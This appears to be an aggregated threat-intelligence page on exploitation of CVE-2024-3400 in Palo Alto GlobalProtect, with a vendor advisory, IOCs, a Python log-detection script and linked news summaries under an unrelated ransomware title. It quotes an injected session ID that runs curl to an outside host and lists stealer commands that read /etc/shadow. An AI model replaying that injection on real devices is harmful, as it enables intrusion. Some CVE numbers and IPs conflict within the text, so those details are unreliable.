Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape | Google Cloud Blog

An overview of the ransomware landscape and common TTPs directly observed in 2025 ransomware incidents.

Google Cloud Blog
📱 Massive attack campaign against Palo Alto GlobalProtect portals from 7,000+ IPs
📝 According to Cyber Security News, an active exploitation campaign has been targeting Palo Alto Networks GlobalProtect portals since late Nov...
📖 cyberveille: https://cyberveille.ch/posts/2025-12-08-vaste-campagne-dattaques-contre-les-portails-palo-alto-globalprotect-depuis-7-000-ip/
🌐 source: https://cybersecuritynews.com/palo-alto-globalprotect-attacks/
#CVE_2024_3400 #GlobalProtect #Cyberveille
Massive attack campaign against Palo Alto GlobalProtect portals from 7,000+ IPs

According to Cyber Security News, an active exploitation campaign has been targeting Palo Alto Networks GlobalProtect portals since late November 2025, with tracking by GrayNoise and Shadowserver showing scans and intrusion attempts coming from more than 7,000 IPs distributed worldwide.

Context and scale of the attack

• Massive scans and exploitation attempts are targeting GlobalProtect gateways exposed on the Internet, notably via UDP 4501. The sources include residential proxies, bulletproof hosters, and compromised VPS in Asia, Europe, and North America. One researcher mentions actors who chain known exploits and look for weak configurations.

CyberVeille
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs

Ransomware group Black Basta’s chat logs were leaked, revealing 62 mentioned CVEs. GreyNoise identified 23 of these CVEs as actively exploited, with some targeted in the last 24 hours.

Alerts of Exploiting Palo Alto GlobalProtect: CVE-2024-3400

> The following blog post is based on our April H2 Vulnerability Insights Report.
>
> TeamT5 Vulnerability Research Team is dedicated to providing timely mitigation and response guidelines to critical vulnerabilities. Contact us for more information about our vulnerability intelligence.

## Alerts of Exploiting Palo Alto Networks PAN-OS

TeamT5 released mitigation and response guidelines to a vulnerability in Palo Alto Networks PAN-OS software, CVE-2024-3400. CVE-2024-3400 is an arbitrary file creation vulnerability in the GlobalProtect portals of Palo Alto Networks PAN-OS software that will allow unauthenticated threat actors to execute arbitrary code and deploy malware to the targets' devices with root privilege. Notably, CVE-2024-3400 has a prerequisite of enabling the GlobalProtect gateway or portal. If enabled, the threat actors can exploit the arbitrary file creation vulnerability resulting from the GlobalProtect portals to achieve command injection for remote code execution.

### Executive Summary

We assess the severity level of CVE-2024-3400 is critical and urge our customers to use this report to mitigate the effects. First, Proof of Concepts (PoC) exploiting CVE-2024-3400 have been circulating in the wild.[1] Second, Palo Alto confirmed the attack attempts exploiting the vulnerability.[2] Last, public reports [3] [4] have revealed that state actors exploited CVE-2024-3400 in the attacks. Our telemetry detected at least two APT groups exploiting CVE-2024-3400 since March 2024, SLIME60 and SLIME61; both are newly identified APT groups. We summarized the activities in the **Exploitation Status** subsection. Based on the exploitation status, we depicted the Possible Attack Scenario in this report. We also concluded the IOCs in Appendix I: Malware and Appendix II: Indicators of Compromise (IoC). Most importantly, we prepared a comprehensive Mitigation and Response Advisory for our customers.

The Mitigation and Response Advisory includes:

- Mitigation Advisory
- Threat Hunting Tools, including two nuclei-based scanners:
  - Nuclei-based UPStyle webshell scanner
  - Nuclei-based scanner to check if your device is compromised via XStealer

### Exploitation Status

Threat actors have been actively exploiting CVE-2024-3400 since March 2024. Moreover, our telemetry identified at least two APT groups, including China-nexus APT SLIME60 and a newly identified APT group, SLIME61.

- SLIME60 has exploited CVE-2024-3400 with XStealer since late April 2024. The target scope includes the manufacturing industry in Taiwan and the education, medical, and manufacturing industries in Japan. Notably, based on Chinese characters in scripts from C2, we hold high confidence that SLIME60 originated from China.
- SLIME61 (aka UTA0218) has exploited CVE-2024-3400 as a zero-day with the UPStyle web shell in several attacks, including an attack against the manufacturing industry in Saudi Arabia.

### Affected Products

PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both)

### Mitigation and Response Advisory

#### 1. Official Information

Palo Alto released the official mitigation advisory.

- Applying Vulnerability Protection to GlobalProtect Interfaces
- URL: https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184

The vulnerability is patched in PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. We recommend our customers upgrade their Palo Alto Networks PAN-OS software to the corresponding version. Notably, while exploiting CVE-2024-3400 requires the GlobalProtect gateway or portal, Palo Alto has warned that disabling device telemetry is not an effective mitigation.

#### 2. Threat Hunting Tools

As state actors have actively exploited CVE-2024-3400, our vulnerability research team prepared two scanners for our customers to check if your devices have been attacked by the threat actors, including:

- Nuclei-based UPStyle webshell scanner
- Nuclei-based scanner to check if your device is compromised via XStealer

Our customers can download the tools from [Threat Hunting Tools](https://threatvision.org/downloads).

## Possible Attack Scenario

Threat actors have been actively exploiting CVE-2024-3400 since March 2024. We recommend our customers check the PAN-OS CLI to find out if your device was attacked by the threat actors with the following command:

```
> grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log*
message:"failed to unmarshal session(./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}11.22.33.44:1234?user
```

Specifically, our telemetry identified at least two APT groups, including China-nexus APT SLIME60 and a newly identified APT group, SLIME61.

#### 1. SLIME60

SLIME60 has exploited CVE-2024-3400 since late April 2024. The target scope includes the manufacturing industry in Taiwan and the education, medical, and manufacturing industries in Japan. In the attack, we identified three samples (Sample 1-3) of a new infostealer, XStealer.

| XStealer | SHA-256 |
|-|-|
| Sample 1 | 5f4699232d6c95cb4b4b6390998fc754a751c6018d9fd79f22bf423de2430ca8 |
| Sample 2 | 2cae066e5239bb69bdb7a7f36374e2493793576024c51e06f046a61f990ffce7 |
| Sample 3 | 8ef883085b48c0e1b733640d171ebc574ddfd5a231620f10926f83573abe4317 |

At runtime, XStealer can collect the network infrastructure and access credentials, and execute Linux commands to collect system information. Such commands include: `whoami`, `/etc/passwd`, `/etc/host`, `hostname`, `ifconfig`, `uname`, `/etc/issue/`, `/etc/shadow`, `netstat, arp`, `ps`, `df -a`, `/etc/resolv.conf`, `crontab -l`, `bash_history`, `last -n 30`.

Notably, according to Chinese characters in the scripts, we hold high confidence that SLIME60 originated from China. Our customers can check the following path to find out if your devices are compromised by SLIME60: https://PA_OS_IP/global-protect/portal/css/results.css. We also provide a nuclei-based scanner for our customers. The scanner can be downloaded from [Threat Hunting Tools](https://threatvision.org/downloads) (for TeamT5's customers).

#### 2. SLIME61

SLIME61 (aka UTA0218) has exploited CVE-2024-2400 as a zero-day with the UPStyle web shell in several attacks, including an attack against the manufacturing industry in Saudi Arabia. Specifically, we identified four UPStyle[6] samples: Sample 4 and 5 are UPStyle web shells, whereas Sample 6 and 7 are UPStyle droppers that will drop a child sample (Sample 8) to `/usr/lib/python3.6/site-packages/system.pth`. The child sample is an UPStyle web shell.

| UPStyle | Feature | SHA-256 |
|-|-|-|
| Sample 4 | Web shell | ab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f3 |
| Sample 5 | Web shell | 710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb |
| Sample 6 | Dropper | 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac |
| Sample 7 | Dropper | 949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605 |
| Sample 8 (Child Sample) | Web shell | 661b77ece99938090582d2e92e96417b20c2a7410bcc95e7f3959f40be066b34 |

The C2s of the attacks are 144.172.79.92 and 172.233.228.93. Pivoting from the C2, we found more IPs used by SLIME61:

- 66.235.168.222
- 89.187.187.69

We provide the UPStyle scanner for customers to check if your devices have been targeted by SLIME61. Our customers can download the tool from [Threat Hunting Tools](https://threatvision.org/downloads) (for TeamT5's customers).

### Appendix I: Malware Table

The malware table below summarizes the malware used in attacks related to CVE-2023-26360.

| Name | Type | Description | Attribution | First Seen |
|-|-|-|-|-|
| UPStyle | Web shell | UPStyle is a web shell specified for Palo Alto SSL VPN (PAN-OS). Actors send a request to the Palo Alto VPN service to generate a crafted error log, and UPStyle parses the error log to execute arbitrary commands. | SLIME61 | 2024.04 |
| XStealer | Infostealer | XStealer is a generic information stealer specified for UNIX-like platforms, and it collects system information such as process list, network status, login credentials, etc. Then, XStealer stores that information in a CSS file. | SLIME60 | 2024.04 |

### Appendix II: Indicators of Compromise (IoC)

hash

```
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
661b77ece99938090582d2e92e96417b20c2a7410bcc95e7f3959f40be066b34
949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605
ab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f3
710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb
5f4699232d6c95cb4b4b6390998fc754a751c6018d9fd79f22bf423de2430ca8
2cae066e5239bb69bdb7a7f36374e2493793576024c51e06f046a61f990ffce7
8ef883085b48c0e1b733640d171ebc574ddfd5a231620f10926f83573abe4317
```

IP

```
144.172.79.9
172.233.228.93
66.235.168.222
89.187.187.69
```

### Appendix III: Other critical CVEs

Below is a link to another TeamT5 vulnerability report, **Patch Management Report (PMR)**. Published every two weeks (or more), the PMR will provide our customers with concise yet comprehensive updates on the most critical and exploitable vulnerabilities selected by the TeamT5 vulnerability research team during the period. Each vulnerability will be provided with patch information. If you are interested in subscribing to this new report series, please contact TeamT5 for more information.

[Patch Management Report](https://threatvision.org/reports/vulnerability/pm-report/pmr-detail?pmReport=2023-Apr-2)

## Reference

1. https://github.com/pwnj0hn/CVE-2024-3400/blob/main/main.py
2. https://security.paloaltonetworks.com/CVE-2024-3400
3. https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
4. https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
5. https://threatvision.org/downloads
6. UPStyle was first identified and named by Volexity during the investigation of SLIME61's attacks exploiting CVE-2024-3400. https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/

> **Threat Analyst Summit 2024: Call for Presentations!**
> In the ever-evolving landscape of cybersecurity, staying one step ahead is not just an advantage, it's imperative. Join us at this year's Threat Analyst Summit, where we bring together the brightest minds in the industry to explore, learn, and collaborate. Our theme, "Stay Informed, Stay Secure", underscores the critical role of continuous intelligence in safeguarding against emerging threats.
> With the rapid evolution of ICT, TeamT5 encourages pioneering research that addresses not only technical challenges but also the legal, policy, economic, psychological, and societal aspects of cybersecurity. We invite you to submit presentations.
> - Final Deadline for Submissions: August 15, 2024, 22:00 UTC+8 (14:00 UTC+0)
> - More info: [link](https://tas2024.teamt5.org/CFP?utm_source=event&utm_medium=website)

TeamT5
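As an added defender-side example (not TeamT5's scanner and not part of the original post), the following Python script applies the same `failed to unmarshal session(` check that the PAN-OS CLI grep above performs, but offline against exported gpsvc.log text, and separates ordinary unmarshal errors from entries whose session ID carries path traversal or shell metacharacters. The log lines are constructed for the example; the injected session ID on line 2 is the one quoted in the post.

```python
import re

# Constructed sample mp-log gpsvc.log lines (not captured from a real device).
SAMPLE_LOG = """\
2024-04-12 10:01:02 message:"failed to unmarshal session(abc123def456)"
2024-04-12 10:02:15 message:"failed to unmarshal session(./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}11.22.33.44:1234?user=`)"
2024-04-12 10:03:40 message:"failed to unmarshal session(./../../../opt/panlogs/tmp/device_telemetry/minute/harmless-name)"
2024-04-12 10:04:00 message:"session established for user alice"
"""

# The SESSID cookie value is echoed back inside the error message; the
# greedy match ends at the last ")" so nested "$(...)" payloads are kept whole.
UNMARSHAL_RE = re.compile(r'failed to unmarshal session\((?P<sid>.*)\)"?\s*$')
TRAVERSAL_RE = re.compile(r'\.\./')
# Shell metacharacters have no business in a session ID; they only appear when
# someone is trying to smuggle a command into the telemetry file name.
SHELL_META_RE = re.compile(r'`|\$\(|\$\{IFS\}|;|\|')


def classify_line(line):
    """Return None for lines without an unmarshal error, else a verdict dict."""
    m = UNMARSHAL_RE.search(line)
    if not m:
        return None
    sid = m.group('sid')
    traversal = bool(TRAVERSAL_RE.search(sid))
    shell = bool(SHELL_META_RE.search(sid))
    if traversal and shell:
        verdict = 'command-injection-attempt'   # both bugs chained, as in the post
    elif traversal:
        verdict = 'traversal-only'              # arbitrary-file-creation primitive
    else:
        verdict = 'benign-unmarshal-error'      # malformed cookie, nothing more
    return {'session_id': sid, 'traversal': traversal,
            'shell_meta': shell, 'verdict': verdict}


def scan_gpsvc_log(text):
    """Return the suspicious findings (with 1-based line numbers) from log text."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        result = classify_line(line)
        if result and result['verdict'] != 'benign-unmarshal-error':
            result['line_no'] = line_no
            findings.append(result)
    return findings


if __name__ == '__main__':
    for f in scan_gpsvc_log(SAMPLE_LOG):
        print(f"line {f['line_no']}: {f['verdict']} -> {f['session_id']}")
```

A hit shows only that an attempt reached the device; confirming success still requires checking for the created file under the telemetry directory and for the web shell paths the post lists.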
Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices

Last month, Volexity reported on its discovery of zero-day, in-the-wild exploitation of CVE-2024-3400 in the GlobalProtect feature of Palo Alto Networks PAN-OS by a threat actor Volexity tracks as UTA0218. Volexity has conducted several additional incident response investigations and proactive analyses of Palo Alto Networks firewall devices since the initial two cases described in Volexity’s blog post. Volexity believes with moderate confidence that UTA0218 is a Chinese-based threat actor based on the targeting and infrastructure used for this campaign. This blog post aims to provide details on methods for investigating potentially compromised Palo Alto Networks firewall devices and a general approach towards edge device threat detection.

Volexity

Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall, a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC

More on the PAN-OS CVE-2024-3400

PSIRT learned of a suspicious exfiltration attempt at a customer site. Palo Alto Networks' team investigated the issue with Volexity's team.

Palo Alto Networks Blog

Bleeping Computer: GreyNoise and ShadowServer Foundation are reporting active exploitation of CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). The good news is that all hotfixes for vulnerable versions of PAN-OS are now released. 🔗 https://www.bleepingcomputer.com/news/security/22-500-palo-alto-firewalls-possibly-vulnerable-to-ongoing-attacks/

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev

22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks

Approximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection vulnerability that has been actively exploited in attacks since at least March 26, 2024.

BleepingComputer

Zscaler observed exploitation of the Palo Alto Networks PAN-OS command injection zero-day vulnerability CVE-2024-3400 following the release of the PoC exploit code. Zscaler provides an attack flow diagram, and a technical analysis of the Upstyle backdoor and its layers. IOC provided. 🔗 https://www.zscaler.com/blogs/security-research/look-cve-2024-3400-activity-and-upstyle-backdoor-technical-analysis

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC

A Look at CVE-2024-3400 Activity and Upstyle Backdoor Technical Analysis

Delve into CVE-2024-3400, a zero-day command-injection flaw in PAN-OS. Uncover exploitation trends in Zscaler's intelligence network and a Python-based backdoor

TrustedSec CTO Justin Elze shared a CVE-2024-3400 exploit in the wild on Twitter yesterday, reporting that 149.28.194.95 was attempting to exploit CVE-2024-3400

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC

The #golang `gorilla/sessions` directory traversal and file (over)write is now being tracked as GO-2024-2730: https://go-review.googlesource.com/c/vulndb/+/579655

This issue was (co)-discovered as part of watchTowr's analysis of the Palo Alto Networks RCE (#CVE_2024_3400), but is entirely separate, and affects a wide range of Go-based web services.

https://github.com/golang/vulndb/issues/2730

If you use gorilla/sessions with the FilesystemStore, please switch to the CookieStore instead until a patch is available.